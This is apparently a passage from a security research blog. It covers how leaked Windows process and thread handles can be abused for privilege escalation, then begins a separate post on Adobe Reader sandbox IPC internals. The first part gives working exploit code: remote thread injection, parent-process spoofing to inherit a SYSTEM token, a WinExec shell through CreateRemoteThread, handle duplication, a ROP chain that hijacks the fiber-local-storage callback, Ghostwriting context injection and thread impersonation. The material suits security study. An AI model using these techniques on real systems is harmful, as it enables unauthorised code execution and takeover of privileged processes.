105
106
107
108
109
110
111
112
void ProcessHandles()
{
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    _NtQuerySystemInformation NtQuerySystemInformation =
        (_NtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
    _NtDuplicateObject NtDuplicateObject =
        (_NtDuplicateObject)GetProcAddress(hNtdll, "NtDuplicateObject");
    _NtQueryObject NtQueryObject =
        (_NtQueryObject)GetProcAddress(hNtdll, "NtQueryObject");
    _RtlEqualUnicodeString RtlEqualUnicodeString =
        (_RtlEqualUnicodeString)GetProcAddress(hNtdll, "RtlEqualUnicodeString");
    _RtlInitUnicodeString RtlInitUnicodeString = 
        (_RtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

    ULONG handleInfoSize = 0x10000;
    NTSTATUS status;
    PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
    DWORD dwPid = GetCurrentProcessId();


    printf("[+] Looking for process handles...\n");

    while ((status = NtQuerySystemInformation(
        SystemHandleInformation,
        phHandleInfo,
        handleInfoSize,
        NULL
    )) == STATUS_INFO_LENGTH_MISMATCH)
        phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(phHandleInfo, handleInfoSize *= 2);

    if (status != STATUS_SUCCESS)
    {
        printf("NtQuerySystemInformation failed!\n");
        return;
    }

    printf("[+] Fetched %d handles\n", phHandleInfo->HandleCount);

    // iterate handles until we find the privileged process
    for (int i = 0; i < phHandleInfo->HandleCount; ++i)
    {
        SYSTEM_HANDLE handle = phHandleInfo->Handles[i];
        POBJECT_TYPE_INFORMATION objectTypeInfo;
        PVOID objectNameInfo;
        UNICODE_STRING objectName;
        ULONG returnLength;

        // Check if this handle belongs to the PID the user specified
        if (handle.ProcessId != dwPid)
            continue;

        objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectTypeInformation,
            objectTypeInfo,
            0x1000,
            NULL
        ) != STATUS_SUCCESS)
            continue;

        if (handle.GrantedAccess == 0x0012019f)
        {
            free(objectTypeInfo);
            continue;
        }

        objectNameInfo = malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectNameInformation,
            objectNameInfo,
            0x1000,
            &returnLength
        ) != STATUS_SUCCESS)
        {
            objectNameInfo = realloc(objectNameInfo, returnLength);
            if (NtQueryObject(
                (HANDLE)handle.Handle,
                ObjectNameInformation,
                objectNameInfo,
                returnLength,
                NULL
            ) != STATUS_SUCCESS)
            {
                free(objectTypeInfo);
                free(objectNameInfo);
                continue;
            }
        }

        // check if we've got a process object; there should only be one, but should we 
        // have multiple, this is where we'd perform the checks
        objectName = *(PUNICODE_STRING)objectNameInfo;
        UNICODE_STRING pProcess, pThread;

        RtlInitUnicodeString(&pThread, L"Thread");
        RtlInitUnicodeString(&pProcess, L"Process");
        if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pProcess, TRUE) && TARGET == 0) {
            printf("[+] Found process handle (%x)\n", handle.Handle);
            HANDLE hProcess = (HANDLE)handle.Handle;
        }
        else if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pThread, TRUE) && TARGET == 1) {
            printf("[+] Found thread handle (%x)\n", handle.Handle);
            HANDLE hThread = (HANDLE)handle.Handle;
        else
            continue;
        
        free(objectTypeInfo);
        free(objectNameInfo);
    }
} 

We’re essentially just fetching all system handles, filtering down to ones belonging to our process, then hunting for a thread or a process. In a more active client process with many threads or process handles we’d need to filter down further, but this is sufficient for testing.

The remainder of this post will be broken down into process and thread security access rights.

Process

There are approximately 14 process-specific rights[3]. We’re going to ignore the standard object access rights for now (DELETE, READ_CONTROL, etc.) as they apply more to the handle itself than what it allows one to do.

Right off the bat, we’re going to dismiss the following:

1
2
3
4
5
6
7
8
PROCESS_QUERY_INFORMATION
PROCESS_QUERY_LIMITED_INFORMATION
PROCESS_SUSPEND_RESUME
PROCESS_TERMINATE
PROCESS_SET_QUOTA
PROCESS_VM_OPERATION
PROCESS_VM_READ
SYNCHRONIZE

To be clear I’m only suggesting that the above access rights cannot be exploited on their own; they are, of course, very useful when roped in with others. There may be weird edge cases in which one of these might be useful (PROCESS_TERMINATE, for example), but barring any magic, I don’t see how.

That leaves the following:

1
2
3
4
5
6
PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_SET_INFORMATION
PROCESS_VM_WRITE

We’ll run through each of these individually.

PROCESS_ALL_ACCESS

The most obvious of them all, this one grants us access to it all. We can simply allocate memory and create a thread to obtain code execution:

1
2
3
4
char payload[] = "\xcc\xcc";
LPVOID lpBuf = VirtualAllocEx(hProcess, NULL, 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, lpBuf, payload, 2, NULL);
CreateRemoteThread(hProcess, NULL, 0, lpBuf, 0, 0, NULL);

Nothing to it.

PROCESS_CREATE_PROCESS

This right is β€œrequired to create a process”, which is to say that we can spawn child processes. To do this remotely, we just need to spawn a process and set its parent to the privileged process we’ve got a handle to. This will create the new process and inherit its parent token which will hopefully be a SYSTEM token.

Here’s how we do that:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
STARTUPINFOEXA sinfo = { sizeof(sinfo) };
PROCESS_INFORMATION pinfo;
LPPROC_THREAD_ATTRIBUTE_LIST ptList = NULL;
SIZE_T bytes;

sinfo.StartupInfo.cb = sizeof(STARTUPINFOEXA);
InitializeProcThreadAttributeList(NULL, 1, 0, &bytes);
ptList = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(bytes);
InitializeProcThreadAttributeList(ptList, 1, 0, &bytes);

UpdateProcThreadAttribute(ptList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hPrivProc, sizeof(HANDLE), NULL, NULL);
sinfo.lpAttributeList = ptList;

CreateProcessA("cmd.exe", (LPSTR)"cmd.exe /c calc.exe", 
        NULL, NULL, TRUE, 
        EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, 
        &sinfo.StartupInfo, &pinfo);

We should now have calc running with the privileged token. Obviously we’d want to replace that with something more useful!

PROCESS_CREATE_THREAD

Here we’ve got the ability to use CreateRemoteThread, but can’t control any memory in the target process. There are of course ways we can influence memory without direct write access, such as WNF, but we’d still have no way of resolving those addresses. As it turns out, however, we don’t need the control. CreateRemoteThread can be pointed at a function with a single argument, which gives us quite a bit of control. LoadLibraryA and WinExec are both great candidates for executing child processes or loading arbitrary code.

As example, there’s an ANSI cmd.exe located in msvcrt.dll at offset 0x503b8. We can pass this as an argument to CreateRemoteThread and trigger a WinExec call to pop a shell:

1
2
3
4
5
DWORD dwCmd = (GetModuleBaseAddress(GetCurrentProcessId(), L"msvcrt.dll") + 0x503b8);
HANDLE hThread = CreateRemoteThread(hPrivProc, NULL, 0,
                        (LPTHREAD_START_ROUTINE)WinExec, 
                        (LPVOID)dwCmd, 
                        0, NULL);

We can do something similar for LoadLibraryA. This of course is predicated on the system path containing a writable directory for our user.

PROCESS_DUP_HANDLE

Microsoft’s own documentation on process security and access rights points to this specifically as a sensitive right. Using it, we can simply duplicate our process handle with PROCESS_ALL_ACCESS, allowing us full RW to its address space. As per Ivan Fratric’s JIT bug, it’s as simple as this:

1
2
HANDLE hDup = INVALID_HANDLE_VALUE;
DuplicateHandle(hPrivProc, GetCurrentProcess(), GetCurrentProcess(), &hDup, PROCESS_ALL_ACCESS, 0, 0)

Now we can simply follow the WriteProcessMemory/CreateRemoteThread strategy for executing arbitrary code.

PROCESS_SET_INFORMATION

Granting this permission allows one to execute SetInformationProcess in addition to several fields in NtSetInformationProcess. The latter is far more powerful, but many of the PROCESSINFOCLASS fields available are either read only or require additional privileges to actually set (SeDebugPrivilege for ProcessExceptionPort and ProcessInstrumentationCallback(win7) for example). Process Hacker[15] maintains an up to date definition of this class and its members.

Of the available flags, none were particularly interesting on their own. I needed to add PROCESS_VM_* privileges in order to make any usable and at that point we defeat the purpose.

PROCESS_VM_*

This covers the three flavors of VM access: WRITE/READ/OPERATION. The first two should be self-explanatory and the third allows one to operate on the virtual address space itself, such as changing page protections (VirtualProtectEx) or allocating memory (VirtualAllocEx). I won’t address each permutation of these three, but I think it’s reasonable to assume that PROCESS_VM_WRITE is a necessary requirement. While PROCESS_VM_OPERATION allows us to crash the remote process which could open up other flaws, it’s not a generic nor elegant approach. Ditto with PROCESS_VM_READ.

PROCESS_VM_WRITE proved to be a challenge on its own, and I was unable to come up with a generic solution. At first blush, the entire set of Shatter-like injection strategies documented by Hexacorn[12] seem like they’d be perfect. They simply require the remote process to use windows, clipboard registrations, etc. None of these are guaranteed, but chances are one is bound to exist. Unfortunately for us, many of them restrict access across sessions or scaling integrity levels. We can write into the remote process, but we need some way to gain control over execution flow.

In addition to being unable to modify page permissions, we cannot read nor map/allocate memory. There are plenty of ways we can leak memory from the remote process without directly interfacing with it, however.

Using NtQuerySystemInformation, for example, we can enumerate all threads inside a remote process regardless of its IL. This grants us a list of SYSTEM_EXTENDED_THREAD_INFORMATION objects which contain, among other things, the address of the TEB. NtQueryInformationProcess allows us to fetch the remote process PEB address. This latter API requires the PROCESS_QUERY_INFORMATION right, however, which ended up throwing a major wrench in my plan. Because of this I’m appending PROCESS_QUERY_INFORMATION onto PROCESS_VM_WRITE which gives us the necessary components to pull this off. If someone knows of a way to leak the address of a remote process PEB without it, I’d love to hear.

The approach I took was a bit loopy, but it ended up working reliably and generically. If you’ve read my previous post on fiber local storage (FLS)[13], this is the research I was referring to. If you haven’t, I recommend giving it a brief read, but I’ll regurgitate a bit of it here.

Briefly, we can abuse fibers and FLS to overwrite callbacks which are executed β€œβ€¦on fiber deletion, thread exit, and when an FLS index is freed”. The primary thread of a process will always setup a fiber, thus there will always be a callback for us to overwrite (msvcrt!_freefls). Callbacks are stored in the PEB (FlsCallback) and the fiber local storage in the TEB (FlsData). By smashing the FlsCallback we can obtain control over execution flow when one of the fiber actions are taken.

With only write access to the process, however, this becomes a bit convoluted. We cannot allocate memory and so we need some known location to put the payload. In addition, the FlsCallback and FlsData variables in PEB/TEB are pointers and we’re unable to read these.

Stashing the payload turned out to be pretty simple. Since we’ve established we can leak PEB/TEB addresses we already have two powerful primitives. After looking over both structures, I found that thread local storage (TLS) happened to provide us with enough room to store ROP gadgets and a thin payload. TLS is embedded within the structure itself, so we can simply offset into the TEB address (which we have). If you’re unfamiliar with TLS, Skywing’s write-ups are fantastic and have aged well[14].

Gaining control over the callback was a little trickier. A pointer to a _FLS_CALLBACK_INFO structure is stored in the PEB (FlsCallback) and is an opaque structure. Since we can’t actually read this pointer, we have no simple way of overwriting the pointer. Or do we?

What I ended up doing is overwriting the FlsCallback pointer itself in the PEB, essentially creating my own fake _FLS_CALLBACK_INFO structure in TLS. It’s a pretty simple structure and really only has one value of importance: the callback pointer.

In addition, as per the FLS article, we also need to take control over ECX/RCX. This will allow us to stack pivot and continue executing our ROP payload. This requires that we update the TEB->FlsData entry which we also are unable to do, since it’s a pointer. Much like FlsCallback, though, I was able to just overwrite this value and craft my own data structure, which also turned out to be pretty simple. The TLS buffer ended up looking like this:

1
2
3
4
5
//
// 0  ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] 41414141 41414141 41414141 41414141 
//

There just so happens to be a perfect stack pivot gadget located in kernelbase!SwitchToFiberContext (or kernel32!SwitchToFiber on Windows 7):

1
2
7603c415 8ba1d8000000    mov     esp,dword ptr [ecx+0D8h]
7603c41b c20400          ret     4

Putting this all together, execution results in:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c415 esp=0019fd6c ebp=0019fd84 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
kernel32!SwitchToFiber+0x115:
7603c415 8ba1d8000000    mov     esp,dword ptr [ecx+0D8h]
ds:0023:7ffdee2c=7ffdee30
0:000> p
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c41b esp=7ffdee30 ebp=0019fd84 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
kernel32!SwitchToFiber+0x11b:
7603c41b c20400          ret     4
0:000> dd esp l3
7ffdee30  41414141 41414141 41414141

Now we’ve got EIP and a stack pivot. Instead of marking memory and executing some other payload, I took a quick and lazy strategy and simply called LoadLibraryA to load a DLL off disk from an arbitrary location. This works well, is reliable, and even on process exit will execute and block, depending on what you do within the DLL. Here’s the final code to achieve all this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
_NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll"), "NtWriteVirtualMemory");

LPVOID lpBuf = malloc(13*sizeof(SIZE_T));
HANDLE hProcess = OpenProcess(PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, FALSE, dwTargetPid);
if (hProcess == NULL)
    return;

SIZE_T LoadLibA = (SIZE_T)LoadLibraryA;
SIZE_T RemoteTeb = GetRemoteTeb(hProcess), TlsAddr = 0;
TlsAddr = RemoteTeb + 0xe10;

SIZE_T RemotePeb = GetRemotePeb(hProcess);
SIZE_T PivotGadget = 0x7603c415;
SIZE_T StackAddress = (TlsAddr + 28) - 0xd8;
SIZE_T RtlExitThread = (SIZE_T)GetProcAddress(GetModuleHandleA("ntdll"), "RtlExitUserThread");
SIZE_T LoadLibParam = (SIZE_T)TlsAddr + 48;

//
// construct our TlsSlots payload:
// 0  ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] [LOADLIB ADDR] 41414141 [RET ADDR] [LOADLIB ARG PTR]
// 48 ] 41414141
//

memset(lpBuf, 0x0, 16);
*((DWORD*)lpBuf + 2) = PivotGadget;
*((DWORD*)lpBuf+ 4) = 0;
*((DWORD*)lpBuf + 5) = 0;
*((DWORD*)lpBuf + 6) = StackAddress;

StackAddress = TlsAddr + 32;
*((DWORD*)lpBuf + 7) = StackAddress;
*((DWORD*)lpBuf + 8) = LoadLibA;
*((DWORD*)lpBuf + 9) = 0x41414141; // junk
*((DWORD*)lpBuf + 10) = RtlExitThread;
*((DWORD*)lpBuf + 11) = (SIZE_T)TlsAddr + 48;
*((DWORD*)lpBuf + 12) = 0x41414141; // DLL name (AAAA.dll)

NtWriteVirtualMemory(hProcess, (PVOID)TlsAddr, lpBuf, (13 * sizeof(SIZE_T)), NULL);

// update FlsCallback in PEB and FlsData in TEB
StackAddress = TlsAddr + 12;
NtWriteVirtualMemory(hProcess, (LPVOID)(RemoteTeb + 0xfb4), (PVOID)&StackAddress, sizeof(SIZE_T), NULL);
NtWriteVirtualMemory(hProcess, (LPVOID)(RemotePeb + 0x20c), (PVOID)&TlsAddr, sizeof(SIZE_T), NULL);

If all works well you should see attempts to load AAAA.dll off disk when the callback is executed (just close the process). As a note, we’re using NtWriteVirtualMemory here because WriteProcessMemory requires PROCESS_VM_OPERATION which we may not have.

Another variation of this access might be PROCESS_VM_WRITE|PROCESS_VM_READ. This gives us visibility into the address space, but we still cannot allocate or map memory into the remote process. Using the above strategy we can rid ourselves of the PROCESS_QUERY_INFORMATION requirement and simply read the PEB address out of TEB.

Finally, consider PROCESS_VM_WRITE|PROCESS_VM_READ|PROCESS_VM_OPERATION. Granting us PROCESS_VM_OPERATION loosens the restrictions quite a bit, as we can now allocate memory and change page permissions. This allows us to more easily use the above strategy, but also perform inline and IAT hooks.

Thread

As with the process handles, there are a handful of access rights we can dismiss immediately:

1
2
3
4
5
6
SYNCHRONIZE
THREAD_QUERY_INFORMATION
THREAD_GET_CONTEXT
THREAD_QUERY_LIMITED_INFORMATION
THREAD_SUSPEND_RESUME
THREAD_TERMINATE

Which leaves the following:

1
2
3
4
5
6
7
THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_IMPERSONATE
THREAD_SET_CONTEXT
THREAD_SET_INFORMATION
THREAD_SET_LIMITED_INFORMATION
THREAD_SET_THREAD_TOKEN

THREAD_ALL_ACCESS

There’s quite a lot we can do with this, including everything described in the following thread access rights sections. I personally find the THREAD_DIRECT_IMPERSONATION strategy to be the easiest.

There is another option that is a bit more arcane, but equally viable. Note that this thread access doesn’t give us VM read/write privileges, so there’s no easy to way to β€œwrite” into a thread, since that doesn’t really make sense. What we do have, however, is a series of APIs that sort of grant us that: SetThreadContext[4] and GetThreadContext[5]. About a decade ago a code injection technique dubbed Ghostwriting[6] was released to little fanfare. In it, the author describes a code injection strategy that does not require the typical win32 API calls; there’s no WriteProcessMemory, NtMapViewOfSection, or even OpenProcess.

While the write-up is lacking in a few departments, it’s quite a clever bit of code. In short, the author abuses the SetThreadContext/GetThreadContext calls in tandem with a set of specific assembly gadgets to write a payload, dword by dword, onto the threads stack. Once written, they use NtProtectVirtualMemoryAddress to mark the code RWX and redirect code flow to their payload.

For their write gadget, they hunt for a pattern inside NTDLL:

1
2
MOV [REG1], REG2
RET

They then locate a JMP $, or jump here, which will operate as an auto lock and infinitely loop. Once we’ve found our two gadgets, we suspend the thread. We update its RIP to point to the MOV gadget, set our REG1 to an adjusted RSP so the return address is the JMP $, and set REG2 to the jump gadget. Here’s my write function:

1
2
3
4
5
6
7
8
9
10
void WriteQword(CONTEXT context, HANDLE hThread, size_t WriteWhat, size_t WriteWhere)
{
    SetContextRegister(&context, g_rside, WriteWhat);
    SetContextRegister(&context, g_lside, WriteWhere);

    context.Rsp = StackBase;
    context.Rip = MovAddr;

    WaitForThreadAutoLock(hThread, &context, JmpAddr);
}

The SetContextRegister call simply assigns REG1 and REG2 in our gadget to the appropriate registers. Once those are set, we set our stack base (adjusted from threads RSP) and update RIP to our gadget. The first time we execute this we’ll write our JMP $ gadget to the stack.

They use what they call a thread auto lock to control execution flow (edits mine):

1
2
3
4
5
6
7
8
9
10
11
12
13
void WaitForThreadAutoLock(HANDLE Thread, CONTEXT* PThreadContext,HWND ThreadsWindow,DWORD AutoLockTargetEIP)
{
    SetThreadContext(Thread,PThreadContext);

    do
    {
        ResumeThread(Thread);
        Sleep(30); 
        SuspendThread(Thread);
        GetThreadContext(Thread,PThreadContext);
    }
    while(PThreadContext->Eip!=AutoLockTargetEIP);
}

It’s really just a dumb waiter that allows the thread to execute a little bit each run before checking if the β€œsink” gadget has been reached.

Once our execution hits the jump, we have our write primitive. We can now simply adjust RIP back to the MOV gadget, update RSP, and set REG1 and REG2 to any values we want.

I ported the core function of this technique to x64 to demonstrate its viability. Instead of using it to execute an entire payload, I simply execute LoadLibraryA to load in an arbitrary DLL at an arbitrary path. The code is available on Github[11]. Turning it into something production ready is left as an exercise for the reader ;)

Additionally, while attending Blackhat 2019, I saw a process injection talk by the SafeBreach Labs group. They’ve release a code injection tool that contains an x64 implementation of GhostWriting[10]. While I haven’t personally evaluated it, it’s probably more production ready and usable than mine.

THREAD_DIRECT_IMPERSONATION

This differs from THREAD_IMPERSONATE in that it allows the thread token to be impersonated, not simply TO impersonate. Exploiting this is simply a matter of using the NtImpersonateThread[8] API, as pointed out by James Forshaw[0][7]. Using this we’re able to create a thread totally under our control and impersonate the privileged one:

1
2
hNewThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpRtl, 0, CREATE_SUSPENDED, &dwTid);
NtImpersonateThread(hNewThread, hThread, &sqos);

The hNewThread will now be executing with a SYSTEM token, allowing us to do whatever we need under the privileged impersonation context.

THREAD_IMPERSONATE

Unfortunately I was unable to identify a surefire, generic method for exploiting this one. We have no ability to query the remote thread, nor can we gain any control over its execution flow. We’re simply allowed to manage its impersonation state.

We can use this to force the privileged thread to impersonate us, using the NtImpersonateThread call, which may unlock additional logic bugs in the application. For example, if the service were to create shared resources under a user context for which it would typically be SYSTEM, such as a file, we can gain ownership over that file. If multiple privileged threads access it for information (such as configuration) it could lead to code execution.

THREAD_SET_CONTEXT

While this right grants us access to SetThreadContext, it also conveniently allows us to use QueueUserAPC. This is effectively granting us a CreateRemoteThread primitive with caveat. For an APC to be processed by the thread, it needs to enter an alertable state. This happens when a specific set of win32 functions are executed, so it is entirely possible that the thread never becomes alertable.

If we’re working with an uncooperative thread, SetThreadContext comes in handy. Using it, we can force the thread to become alertable via the NtTestAlert function. Of course, we have no ability to call GetThreadContext and will therefore likely lose control of the thread after exploitation.

In combination with THREAD_GET_CONTEXT, this right would allow us to replicate the Ghostwriting code injection technique discussed in the THREAD_ALL_ACCESS section above.

THREAD_SET_INFORMATION

Needed to set various ThreadInformationClass[9] values on a thread, usually via NtSetInformationThread. After looking through all of these, I did not identify any immediate ways in which we could influence the remote thread. Some of the values are interesting but unusuable (ThreadSetTlsArrayAddress, ThreadAttachContainer, etc) and are either not implemented/removed or require SeDebugPrivilege or similar.

I’m not really sure what would make this a viable candidate either. There’s really not a lot of juicy stuff that can be done via the available functions

THREAD_SET_LIMITED_INFORMATION

This allows the caller to set a subset of THREAD_INFORMATION_CLASS values, namely: ThreadPriority, ThreadPriorityBoost, ThreadAffinityMask, ThreadSelectedCpuSets, and ThreadNameInformation. None of these get us anywhere near an exploitable primitive.

THREAD_SET_THREAD_TOKEN

Similar to THREAD_IMPERSONATE, I was unable to find a direct and generic method of abusing this right. I can set the thread’s token or modify a few fields (via SetTokenInformation), but this doesn’t grant us much.

Conclusion

I was a little disappointed in how uneventful thread rights seemed to be. Almost half of them proved to be unexploitable on their own, and even in combination did not turn much up. As per above, having one of the following three privileges is necessary to turn a leaked thread handle into something exploitable:

1
2
3
THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_SET_CONTEXT

Missing these will require a deeper understanding of your target and some creativity.

Similarly, processes have a specific subset of rights that are directly exploitable:

1
2
3
4
5
PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_VM_WRITE

Barring these, more creativity is required.

References

[0]https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html
[1]https://googleprojectzero.blogspot.com/2018/05/bypassing-mitigations-by-attacking-jit.html
[2]https://d4stiny.github.io/Local-Privilege-Escalation-on-most-Dell-computers/
[3]https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
[4]https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext
[5]https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getthreadcontext
[6]http://blog.txipinet.com/2007/04/05/69-a-paradox-writing-to-another-process-without-openning-it-nor-actually-writing-to-it/
[7]https://tyranidslair.blogspot.com/2017/08/the-art-of-becoming-trustedinstaller.html
[8]https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtImpersonateThread.html
[9]https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/master/NtApiDotNet/NtThreadNative.cs#L51
[10]https://github.com/SafeBreach-Labs/pinjectra
[11]https://gist.github.com/hatRiot/aa77f007601be75684b95fe7ba978079
[12]http://www.hexacorn.com/blog/category/code-injection/
[13]http://hatriot.github.io/blog/2019/08/12/code-execution-via-fiber-local-storage
[14]http://www.nynaeve.net/?p=180
[15]https://github.com/processhacker/processhacker/blob/master/phnt/include/ntpsapi.h#L98

Digging the Adobe Sandbox - IPC Internals

7 August 2020 at 21:10

This post kicks off a short series into reversing the Adobe Reader sandbox. I initially started this research early last year and have been working on it off and on since. This series will document the Reader sandbox internals, present a few tools for reversing/interacting with it, and a description of the results of this research. There may be quite a bit of content here, but I’ll be doing a lot of braindumping. I find posts that document process, failure, and attempt to be far more insightful as a researcher than pure technical result.

I’ve broken this research up into two posts. Maybe more, we’ll see. The first here will detail the internals of the sandbox and introduce a few tools developed, and the second will focus on fuzzing and the results of that effort.

This post focuses primarily on the IPC channel used to communicate between the sandboxed process and the broker. I do not delve into how the policy engine works or many of the restrictions enabled.

Introduction

This is by no means the first dive into the Adobe Reader sandbox. Here are a few prior examples of great work:

2011 – A Castle Made of Sand (Richard Johnson)
2011 – Playing in the Reader X Sandbox (Paul Sabanal and Mark Yason)
2012 – Breeding Sandworms (Zhenhua Liu and Guillaume Lovet)
2013 – When the Broker is Broken (Peter Vreugdenhil)

Breeding Sandworms was a particularly useful introduction to the sandbox, as it describes in some detail the internals of transaction and how they approached fuzzing the sandbox. I’ll detail my approach and improvements in part two of this series.

In addition, the ZDI crew of Abdul-Aziz Hariri, et al. have been hammering on the Javascript side of things for what seems like forever (Abusing Adobe Reader’s Javascript APIs) and have done some great work in this area.

After evaluating existing research, however, it seemed like there was more work to be done in a more open source fashion. Most sandbox escapes in Reader these days opt instead to target Windows itself via win32k/dxdiag/etc and not the sandbox broker. This makes some sense, but leaves a lot of attack surface unexplored.

Note that all research was done on Acrobat Reader DC 20.6.20034 on a Windows 10 machine. You can fetch installers for old versions of Adobe Reader here. I highly recommend bookmarking this. One of my favorite things to do on a new target is pull previous bugs and affected versions and run through root cause and exploitation.

Sandbox Internals Overview

Adobe Reader’s sandbox is known as protected mode and is on by default, but can be toggled on/off via preferences or the registry. Once Reader launches, a child process is spawned under low integrity and a shared memory section mapped in. Inter-process communication (IPC) takes place over this channel, with the parent process acting as the broker.

Adobe actually published some of the sandbox source code to Github over 7 years ago, but it does not contain any of their policies or modern tag interfaces. It’s useful for figuring out variables and function names during reversing, and the source code is well written and full of useful comments, so I recommend pulling it up.

Reader uses the Chromium sandbox (pre Mojo), and I recommend the following resources for the specifics here:

These days it’s known as the β€œlegacy IPC” and has been replaced by Mojo in Chrome. Reader actually uses Mojo to communicate between its RdrCEF (Chromium Embedded Framework) processes which handle cloud connectivity, syncing, etc. It’s possible Adobe plans to replace the broker legacy API with Mojo at some point, but this has not been announced/released yet.

We’ll start by taking a brief look at how a target process is spawned, but the main focus of this post will be the guts of the IPC mechanisms in play. Execution of the child process first begins with BrokerServicesBase::SpawnTarget. This function crafts the target process and its restrictions. Some of these are described here in greater detail, but they are as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
1. Create restricted token
 - via `CreateRestrictedToken`
 - Low integrity or AppContainer if available
2. Create restricted job object
 - No RW to clipboard
 - No access to user handles in other processes
 - No message broadcasts
 - No global hooks
 - No global atoms table access
 - No changes to display settings
 - No desktop switching/creation
 - No ExitWindows calls
 - No SystemParamtersInfo
 - One active process
 - Kill on close/unhandled exception

From here, the policy manager enforces interceptions, handled by the InterceptionManager, which handles hooking and rewiring various Win32 functions via the target process to the broker. According to documentation, this is not for security, but rather:

1
[..] designed to provide compatibility when code inside the sandbox cannot be modified to cope with sandbox restrictions. To save unnecessary IPCs, policy is also evaluated in the target process before making an IPC call, although this is not used as a security guarantee but merely a speed optimization.

From here we can now take a look at how the IPC mechanisms between the target and broker process actually work.

The broker process is responsible for spawning the target process, creating a shared memory mapping, and initializing the requisite data structures. This shared memory mapping is the medium in which the broker and target communicate and exchange data. If the target wants to make an IPC call, the following happens at a high level:

  1. The target finds a channel in a free state
  2. The target serializes the IPC call parameters to the channel
  3. The target then signals an event object for the channel (ping event)
  4. The target waits until a pong event is signaled

At this point, the broker executes ThreadPingEventReady, the IPC processor entry point, where the following occurs:

  1. The broker deserializes the call arguments in the channel
  2. Sanity checks the parameters and the call
  3. Executes the callback
  4. Writes the return structure back to the channel
  5. Signals that the call is completed (pong event)

There are 16 channels available for use, meaning that the broker can service up to 16 concurrent IPC requests at a time. The following diagram describes a high level view of this architecture:

From the broker’s perspective, a channel can be viewed like so:

In general, this describes what the IPC communication channel between the broker and target looks like. In the following sections we’ll take a look at these in more technical depth.

IPC Internals

The IPC facilities are established via TargetProcess::Init, and is really what we’re most interested in. The following snippet describes how the shared memory mapping is created and established between the broker and target:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
  DWORD shared_mem_size = static_cast<DWORD>(shared_IPC_size +
                                             shared_policy_size);
  shared_section_.Set(::CreateFileMappingW(INVALID_HANDLE_VALUE, NULL,
                                           PAGE_READWRITE | SEC_COMMIT,
                                           0, shared_mem_size, NULL));
  if (!shared_section_.IsValid()) {
    return ::GetLastError();
  }

  DWORD access = FILE_MAP_READ | FILE_MAP_WRITE;
  base::win::ScopedHandle target_shared_section;
  if (!::DuplicateHandle(::GetCurrentProcess(), shared_section_,
                         sandbox_process_info_.process_handle(),
                         target_shared_section.Receive(), access, FALSE, 0)) {
    return ::GetLastError();
  }

  void* shared_memory = ::MapViewOfFile(shared_section_,
                                        FILE_MAP_WRITE|FILE_MAP_READ,
                                        0, 0, 0);

The calculated shared_mem_size in the source code here comes out to 65536 bytes, which isn’t right. The shared section is actually 0x20000 bytes in modern Reader binaries.

Once the mapping is established and policies copied in, the SharedMemIPCServer is initialized, and this is where things finally get interesting. SharedMemIPCServer initializes the ping/pong events for communication, creates channels, and registers callbacks.

The previous architecture diagram provides an overview of the structures and layout of the section at runtime. In short, a ServerControl is a broker-side view of an IPC channel. It contains the server side event handles, pointers to both the channel and its buffer, and general information about the connected IPC endpoint. This structure is not visible to the target process and exists only in the broker.

A ChannelControl is the target process version of a ServerControl; it contains the target’s event handles, the state of the channel, and information about where to find the channel buffer. This channel buffer is where the CrossCallParams can be found as well as the call return information after a successful IPC dispatch.

